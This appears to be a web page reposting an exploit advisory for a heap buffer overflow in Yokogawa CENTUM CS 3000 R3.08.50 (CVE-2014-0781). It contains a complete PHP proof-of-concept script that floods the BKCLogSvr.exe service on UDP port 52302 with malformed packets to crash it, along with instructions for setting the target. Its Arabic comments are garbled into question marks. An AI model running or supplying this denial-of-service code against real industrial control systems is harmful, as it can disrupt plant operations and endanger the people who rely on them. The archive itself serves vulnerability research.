Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

=============================================================================================================================================
| # Title : Yokogawa CENTUM =============================================================================================================================================
| # Title : Yokogawa CENTUM CS 3000 R3.08.50 Heap Buffer Overflow vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.yokogawa.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: BKCLogSvr.exe service on Yokogawa CENTUM CS 3000 system, exploiting Heap Buffer Overflow vulnerability to cause Denial of Service (DoS) by sending malformed UDP packets.

Opens UDP connection to port 52302.

Sends malformed packets that cause buffer overflow.

Sends multiple packets to ensure attack execution.

Closes connection after sending.

(Related : https://packetstorm.news/files/id/180485/ Linked CVE numbers: CVE-2014-0781 ) .

[+] save code as poc.php.

[+] Set target : line 3

[+] PayLoad :

<?php
// ??????? ???????
$target = "192.168.1.100"; // ?????? ?????? ?????
$port = 52302;
$rlimit = 10; // ??? ????? ???? ???? ???????

if ($rlimit < 2) {
die("??? ????? ?????? ????????? ??? ????? ?????? ??? DoS.\n");
}

// ????? ?????? ???????
$test = pack("V", 1024); // ??? ??????
$test .= "AAAA"; // ?????? ??? ??????
$test .= "SOURCE\x00\x00"; // ??????
$test .= str_repeat("\x00", 8); // ??? (Padding)
$test .= str_repeat("B", 1024 - strlen($test)); // ????? ???????

// ????? ???? UDP
$socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if (!$socket) {
die("??? ????? ???? UDP: " . socket_strerror(socket_last_error()) . "\n");
}

echo "????? $rlimit ??? ??? $target:$port...\n";

// ????? ?????
for ($i = 1; $i <= $rlimit; $i++) {
echo "????? ?????? $i/$rlimit...\n";
socket_sendto($socket, $test, strlen($test), 0, $target, $port);
}

// ????? ???????
socket_close($socket);

echo "?? ??????? ?????!\n";
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share